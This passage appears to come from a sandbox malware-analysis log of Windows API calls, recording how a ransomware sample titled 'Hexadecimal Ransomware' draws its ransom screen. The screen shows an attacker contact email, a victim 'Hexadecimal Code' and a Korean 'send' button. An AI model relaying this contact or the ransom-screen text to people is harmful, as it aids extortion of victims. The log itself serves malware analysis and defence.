returned 0x0 [0169.218] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0169.218] GetCurrentObject (hdc=0x5b010800, type=0x1) returned 0xb00017 [0169.218] GetCurrentObject (hdc=0x5b010800, type=0x2) returned 0x900010 [0169.219] GetCurrentObject (hdc=0x5b010800, type=0x7) returned 0xb050815 [0169.219] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.219] SaveDC (hdc=0x5b010800) returned 1 [0169.219] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x20040825 [0169.219] GetClipRgn (hdc=0x5b010800, hrgn=0x20040825) returned 0 [0169.219] SelectClipRgn (hdc=0x5b010800, hrgn=0x1104081c) returned 2 [0169.219] DeleteObject (ho=0x20040825) returned 1 [0169.219] DeleteObject (ho=0x1104081c) returned 1 [0169.219] OffsetViewportOrgEx (in: hdc=0x5b010800, x=0, y=0, lppt=0x33441e0 | out: lppt=0x33441e0) returned 1 [0169.219] DrawThemeParentBackground () returned 0x0 [0169.220] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0169.220] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0169.220] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0169.220] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0169.220] GetSystemMetrics (nIndex=42) returned 0 [0169.220] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0169.220] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0169.220] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0169.220] GetCurrentObject (hdc=0x5b010800, type=0x1) returned 0xb00017 [0169.220] GetCurrentObject (hdc=0x5b010800, type=0x2) returned 0x900010 [0169.220] GetCurrentObject (hdc=0x5b010800, type=0x7) returned 0xb050815 [0169.220] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.220] SaveDC (hdc=0x5b010800) returned 2 [0169.220] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.220] CreateSolidBrush (color=0x0) returned 0x19100826 [0169.220] FillRect (hDC=0x5b010800, lprc=0x11fdf30, hbr=0x19100826) returned 1 [0169.221] DeleteObject (ho=0x19100826) returned 1 [0169.221] RestoreDC (hdc=0x5b010800, nSavedDC=-1) returned 1 [0169.221] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0169.221] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0169.221] GetSystemMetrics (nIndex=42) returned 0 [0169.221] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0169.221] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0169.221] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0169.221] GetCurrentObject (hdc=0x5b010800, type=0x1) returned 0xb00017 [0169.221] GetCurrentObject (hdc=0x5b010800, type=0x2) returned 0x900010 [0169.221] GetCurrentObject (hdc=0x5b010800, type=0x7) returned 0xb050815 [0169.221] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.221] SaveDC (hdc=0x5b010800) returned 2 [0169.221] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.221] CreateSolidBrush (color=0x0) returned 0x1a100826 [0169.222] FillRect (hDC=0x5b010800, lprc=0x11fded0, hbr=0x1a100826) returned 1 [0169.222] DeleteObject (ho=0x1a100826) returned 1 [0169.222] RestoreDC (hdc=0x5b010800, nSavedDC=-1) returned 1 [0169.222] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0169.222] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0169.222] GetSystemMetrics (nIndex=42) returned 0 [0169.222] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0169.222] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0169.222] RestoreDC (hdc=0x5b010800, nSavedDC=-1) returned 1 [0169.222] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5b010800) returned 0x0 [0169.222] IsAppThemed () returned 0x1 [0169.223] GetThemeAppProperties () returned 0x3 [0169.223] GetThemeAppProperties () returned 0x3 [0169.223] IsAppThemed () returned 0x1 [0169.223] GetThemeAppProperties () returned 0x3 [0169.223] GetThemeAppProperties () returned 0x3 [0169.223] IsThemePartDefined () returned 0x1 [0169.223] GdipCreateRegion (region=0x11fe454) returned 0x0 [0169.223] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0169.223] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0169.223] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0169.223] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0169.223] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0169.223] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ea0) returned 0x0 [0169.223] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.223] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0169.223] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593c38) returned 0x0 [0169.223] LocalFree (hMem=0x1593c38) returned 0x0 [0169.223] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0169.224] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0169.224] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0169.224] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0169.224] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0169.224] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0169.224] GetCurrentObject (hdc=0x5b010800, type=0x1) returned 0xb00017 [0169.224] GetCurrentObject (hdc=0x5b010800, type=0x2) returned 0x900010 [0169.224] GetCurrentObject (hdc=0x5b010800, type=0x7) returned 0xb050815 [0169.224] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.224] SaveDC (hdc=0x5b010800) returned 1 [0169.224] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1204081c [0169.224] GetClipRgn (hdc=0x5b010800, hrgn=0x1204081c) returned 0 [0169.224] SelectClipRgn (hdc=0x5b010800, hrgn=0x22040825) returned 2 [0169.224] DeleteObject (ho=0x1204081c) returned 1 [0169.225] DeleteObject (ho=0x22040825) returned 1 [0169.225] OffsetViewportOrgEx (in: hdc=0x5b010800, x=0, y=0, lppt=0x3344ba0 | out: lppt=0x3344ba0) returned 1 [0169.225] IsAppThemed () returned 0x1 [0169.225] GetThemeAppProperties () returned 0x3 [0169.225] GetThemeAppProperties () returned 0x3 [0169.225] DrawThemeBackground () returned 0x0 [0169.225] RestoreDC (hdc=0x5b010800, nSavedDC=-1) returned 1 [0169.225] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5b010800) returned 0x0 [0169.225] GdipCreateRegion (region=0x11fe458) returned 0x0 [0169.225] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0169.225] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0169.225] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0169.225] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0169.225] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0169.226] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0169.226] LocalFree (hMem=0x1593c38) returned 0x0 [0169.226] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.226] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0169.226] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.226] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0169.226] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0169.226] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0169.226] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0169.226] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0169.226] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0169.226] GetCurrentObject (hdc=0x5b010800, type=0x1) returned 0xb00017 [0169.226] GetCurrentObject (hdc=0x5b010800, type=0x2) returned 0x900010 [0169.226] GetCurrentObject (hdc=0x5b010800, type=0x7) returned 0xb050815 [0169.226] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.226] SaveDC (hdc=0x5b010800) returned 1 [0169.227] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x23040825 [0169.227] GetClipRgn (hdc=0x5b010800, hrgn=0x23040825) returned 0 [0169.227] SelectClipRgn (hdc=0x5b010800, hrgn=0x1304081c) returned 2 [0169.227] DeleteObject (ho=0x23040825) returned 1 [0169.227] DeleteObject (ho=0x1304081c) returned 1 [0169.227] OffsetViewportOrgEx (in: hdc=0x5b010800, x=0, y=0, lppt=0x3344e74 | out: lppt=0x3344e74) returned 1 [0169.227] IsAppThemed () returned 0x1 [0169.227] GetThemeAppProperties () returned 0x3 [0169.227] GetThemeAppProperties () returned 0x3 [0169.227] GetThemeBackgroundContentRect () returned 0x0 [0169.227] RestoreDC (hdc=0x5b010800, nSavedDC=-1) returned 1 [0169.227] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5b010800) returned 0x0 [0169.227] IsAppThemed () returned 0x1 [0169.227] GetThemeAppProperties () returned 0x3 [0169.227] GetThemeAppProperties () returned 0x3 [0169.227] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0169.227] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0169.228] GetCurrentObject (hdc=0x5b010800, type=0x1) returned 0xb00017 [0169.228] GetCurrentObject (hdc=0x5b010800, type=0x2) returned 0x900010 [0169.228] GetCurrentObject (hdc=0x5b010800, type=0x7) returned 0xb050815 [0169.228] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.228] SaveDC (hdc=0x5b010800) returned 1 [0169.228] GetTextAlign (hdc=0x5b010800) returned 0x0 [0169.228] GetTextColor (hdc=0x5b010800) returned 0x0 [0169.228] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.228] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0169.228] SelectObject (hdc=0x5b010800, h=0x170a07ff) returned 0x8a01c2 [0169.228] GetBkMode (hdc=0x5b010800) returned 2 [0169.228] SetBkMode (hdc=0x5b010800, mode=1) returned 2 [0169.229] DrawTextExW (in: hdc=0x5b010800, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x3345214 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0169.230] DrawTextExW (in: hdc=0x5b010800, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x3345214 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0169.232] RestoreDC (hdc=0x5b010800, nSavedDC=-1) returned 1 [0169.232] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5b010800) returned 0x0 [0169.232] GetFocus () returned 0x0 [0169.232] IsAppThemed () returned 0x1 [0169.232] GetThemeAppProperties () returned 0x3 [0169.232] GetThemeAppProperties () returned 0x3 [0169.232] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0169.232] BitBlt (hdc=0x10105d6, x=0, y=0, cx=64, cy=25, hdcSrc=0x5b010800, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.232] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5b010800) returned 0x0 [0169.232] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.233] SelectObject (hdc=0x5b010800, h=0x85000f) returned 0xb050815 [0169.233] DeleteDC (hdc=0x5b010800) returned 1 [0169.233] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0169.233] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0169.233] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.233] IsWindowUnicode (hWnd=0x102da) returned 1 [0169.233] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.233] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.233] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.234] BeginPaint (in: hWnd=0x102da, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0x10105d6 [0169.234] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.234] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.234] CreateCompatibleDC (hdc=0x10105d6) returned 0x5e010800 [0169.234] SelectObject (hdc=0x5e010800, h=0xb050815) returned 0x85000f [0169.234] GdipCreateFromHDC (hdc=0x5e010800, graphics=0x11fe76c) returned 0x0 [0169.234] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.235] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=150, height=16, combineMode=0x0) returned 0x0 [0169.235] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0169.235] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.235] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7cc) returned 0x0 [0169.235] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.235] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ae8) returned 0x0 [0169.235] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.235] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.235] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0169.235] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.235] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7c0) returned 0x0 [0169.235] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7ec) returned 0x0 [0169.235] GetWindowTextLengthW (hWnd=0x102da) returned 26 [0169.235] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x1a [0169.235] GetSystemMetrics (nIndex=42) returned 0 [0169.235] GetWindowTextW (in: hWnd=0x102da, lpString=0x11fe6d0, nMaxCount=27 | out: lpString="E-Mail: sealocker@daum.net") returned 26 [0169.235] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xd, wParam=0x1b, lParam=0x11fe6d0) returned 0x1a [0169.236] GetClientRect (in: hWnd=0x102da, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0169.236] GdipCreateRegion (region=0x11fe608) returned 0x0 [0169.236] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0169.236] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0169.236] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0169.236] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe620) returned 0x0 [0169.236] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.236] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ae8) returned 0x0 [0169.236] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.236] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0169.236] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0169.236] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593c38) returned 0x0 [0169.236] LocalFree (hMem=0x1593c38) returned 0x0 [0169.236] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0169.236] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe648) returned 0x0 [0169.236] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe638) returned 0x0 [0169.236] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe638) returned 0x0 [0169.237] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0169.237] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe650) returned 0x0 [0169.237] GetCurrentObject (hdc=0x5e010800, type=0x1) returned 0xb00017 [0169.237] GetCurrentObject (hdc=0x5e010800, type=0x2) returned 0x900010 [0169.237] GetCurrentObject (hdc=0x5e010800, type=0x7) returned 0xb050815 [0169.237] GetCurrentObject (hdc=0x5e010800, type=0x6) returned 0x8a01c2 [0169.237] SaveDC (hdc=0x5e010800) returned 1 [0169.237] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1404081c [0169.237] GetClipRgn (hdc=0x5e010800, hrgn=0x1404081c) returned 0 [0169.237] SelectClipRgn (hdc=0x5e010800, hrgn=0x26040825) returned 2 [0169.237] DeleteObject (ho=0x1404081c) returned 1 [0169.237] DeleteObject (ho=0x26040825) returned 1 [0169.237] OffsetViewportOrgEx (in: hdc=0x5e010800, x=0, y=0, lppt=0x33456c4 | out: lppt=0x33456c4) returned 1 [0169.237] GetNearestColor (hdc=0x5e010800, color=0x0) returned 0x0 [0169.238] CreateSolidBrush (color=0x0) returned 0x1b100826 [0169.238] FillRect (hDC=0x5e010800, lprc=0x11fe654, hbr=0x1b100826) returned 1 [0169.238] DeleteObject (ho=0x1b100826) returned 1 [0169.238] RestoreDC (hdc=0x5e010800, nSavedDC=-1) returned 1 [0169.238] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5e010800) returned 0x0 [0169.238] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd9b0dbd) returned 0x0 [0169.238] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.238] GetWindowTextLengthW (hWnd=0x102da) returned 26 [0169.238] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x1a [0169.238] GetSystemMetrics (nIndex=42) returned 0 [0169.238] GetWindowTextW (in: hWnd=0x102da, lpString=0x11fe6d0, nMaxCount=27 | out: lpString="E-Mail: sealocker@daum.net") returned 26 [0169.238] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xd, wParam=0x1b, lParam=0x11fe6d0) returned 0x1a [0169.238] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe670) returned 0x0 [0169.238] GetCurrentObject (hdc=0x5e010800, type=0x1) returned 0xb00017 [0169.238] GetCurrentObject (hdc=0x5e010800, type=0x2) returned 0x900010 [0169.238] GetCurrentObject (hdc=0x5e010800, type=0x7) returned 0xb050815 [0169.239] GetCurrentObject (hdc=0x5e010800, type=0x6) returned 0x8a01c2 [0169.239] SaveDC (hdc=0x5e010800) returned 1 [0169.239] GetNearestColor (hdc=0x5e010800, color=0xffffff) returned 0xffffff [0169.239] RestoreDC (hdc=0x5e010800, nSavedDC=-1) returned 1 [0169.239] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5e010800) returned 0x0 [0169.239] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0169.240] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0169.240] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe610) returned 0x0 [0169.240] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5fc) returned 0x0 [0169.240] GetCurrentObject (hdc=0x5e010800, type=0x1) returned 0xb00017 [0169.240] GetCurrentObject (hdc=0x5e010800, type=0x2) returned 0x900010 [0169.240] GetCurrentObject (hdc=0x5e010800, type=0x7) returned 0xb050815 [0169.240] GetCurrentObject (hdc=0x5e010800, type=0x6) returned 0x8a01c2 [0169.240] SaveDC (hdc=0x5e010800) returned 1 [0169.240] GetTextAlign (hdc=0x5e010800) returned 0x0 [0169.240] GetTextColor (hdc=0x5e010800) returned 0x0 [0169.240] SetTextColor (hdc=0x5e010800, color=0xffffff) returned 0x0 [0169.240] GetCurrentObject (hdc=0x5e010800, type=0x6) returned 0x8a01c2 [0169.240] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0169.241] SelectObject (hdc=0x5e010800, h=0x760a07f4) returned 0x8a01c2 [0169.241] GetBkMode (hdc=0x5e010800) returned 2 [0169.241] SetBkMode (hdc=0x5e010800, mode=1) returned 2 [0169.241] DrawTextExW (in: hdc=0x5e010800, lpchText="E-Mail: sealocker@daum.net", cchText=26, lprc=0x11fe590, format=0x0, lpdtp=0x3345c54 | out: lpchText="E-Mail: sealocker@daum.net", lprc=0x11fe590) returned 16 [0169.242] RestoreDC (hdc=0x5e010800, nSavedDC=-1) returned 1 [0169.242] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5e010800) returned 0x0 [0169.242] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7ac) returned 0x0 [0169.242] BitBlt (hdc=0x10105d6, x=0, y=0, cx=181, cy=16, hdcSrc=0x5e010800, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.242] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5e010800) returned 0x0 [0169.242] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.242] SelectObject (hdc=0x5e010800, h=0x85000f) returned 0xb050815 [0169.242] DeleteDC (hdc=0x5e010800) returned 1 [0169.242] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0169.242] EndPaint (hWnd=0x102da, lpPaint=0x11fe750) returned 1 [0169.243] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.243] IsWindowUnicode (hWnd=0x102dc) returned 1 [0169.243] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.243] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.243] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.243] BeginPaint (in: hWnd=0x102dc, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0x10105d6 [0169.243] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.244] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.244] CreateCompatibleDC (hdc=0x10105d6) returned 0x61010800 [0169.244] SelectObject (hdc=0x61010800, h=0xb050815) returned 0x85000f [0169.244] GdipCreateFromHDC (hdc=0x61010800, graphics=0x11fe76c) returned 0x0 [0169.244] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.244] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=301, height=24, combineMode=0x0) returned 0x0 [0169.244] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0169.244] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.244] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7cc) returned 0x0 [0169.244] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ea0) returned 0x0 [0169.244] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.244] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.245] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0169.245] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.245] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7c0) returned 0x0 [0169.245] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7ec) returned 0x0 [0169.245] GetWindowTextLengthW (hWnd=0x102dc) returned 32 [0169.245] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x20 [0169.245] GetSystemMetrics (nIndex=42) returned 0 [0169.245] GetWindowTextW (in: hWnd=0x102dc, lpString=0x11fe6c4, nMaxCount=33 | out: lpString="Hexadecimal Code: FB 69FA 9979\r\n") returned 32 [0169.245] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xd, wParam=0x21, lParam=0x11fe6c4) returned 0x20 [0169.245] GetClientRect (in: hWnd=0x102dc, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0169.245] GdipCreateRegion (region=0x11fe608) returned 0x0 [0169.245] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0169.245] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0169.246] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0169.246] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe620) returned 0x0 [0169.246] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ea0) returned 0x0 [0169.246] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.246] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0169.246] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ea0) returned 0x0 [0169.246] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.246] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0169.246] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe648) returned 0x0 [0169.246] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe638) returned 0x0 [0169.246] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe638) returned 0x0 [0169.246] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0169.247] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe650) returned 0x0 [0169.247] GetCurrentObject (hdc=0x61010800, type=0x1) returned 0xb00017 [0169.247] GetCurrentObject (hdc=0x61010800, type=0x2) returned 0x900010 [0169.247] GetCurrentObject (hdc=0x61010800, type=0x7) returned 0xb050815 [0169.247] GetCurrentObject (hdc=0x61010800, type=0x6) returned 0x8a01c2 [0169.247] SaveDC (hdc=0x61010800) returned 1 [0169.247] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x27040825 [0169.247] GetClipRgn (hdc=0x61010800, hrgn=0x27040825) returned 0 [0169.398] SelectClipRgn (hdc=0x61010800, hrgn=0x1604081c) returned 2 [0169.398] DeleteObject (ho=0x27040825) returned 1 [0169.398] DeleteObject (ho=0x1604081c) returned 1 [0169.398] OffsetViewportOrgEx (in: hdc=0x61010800, x=0, y=0, lppt=0x3346068 | out: lppt=0x3346068) returned 1 [0169.398] GetNearestColor (hdc=0x61010800, color=0xaab220) returned 0xaab220 [0169.398] CreateSolidBrush (color=0xaab220) returned 0x1c100826 [0169.398] FillRect (hDC=0x61010800, lprc=0x11fe654, hbr=0x1c100826) returned 1 [0169.398] DeleteObject (ho=0x1c100826) returned 1 [0169.398] RestoreDC (hdc=0x61010800, nSavedDC=-1) returned 1 [0169.398] GdipReleaseDC (graphics=0x6e19d80, hdc=0x61010800) returned 0x0 [0169.398] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd990dbd) returned 0x0 [0169.399] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.399] GetWindowTextLengthW (hWnd=0x102dc) returned 32 [0169.399] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x20 [0169.399] GetSystemMetrics (nIndex=42) returned 0 [0169.399] 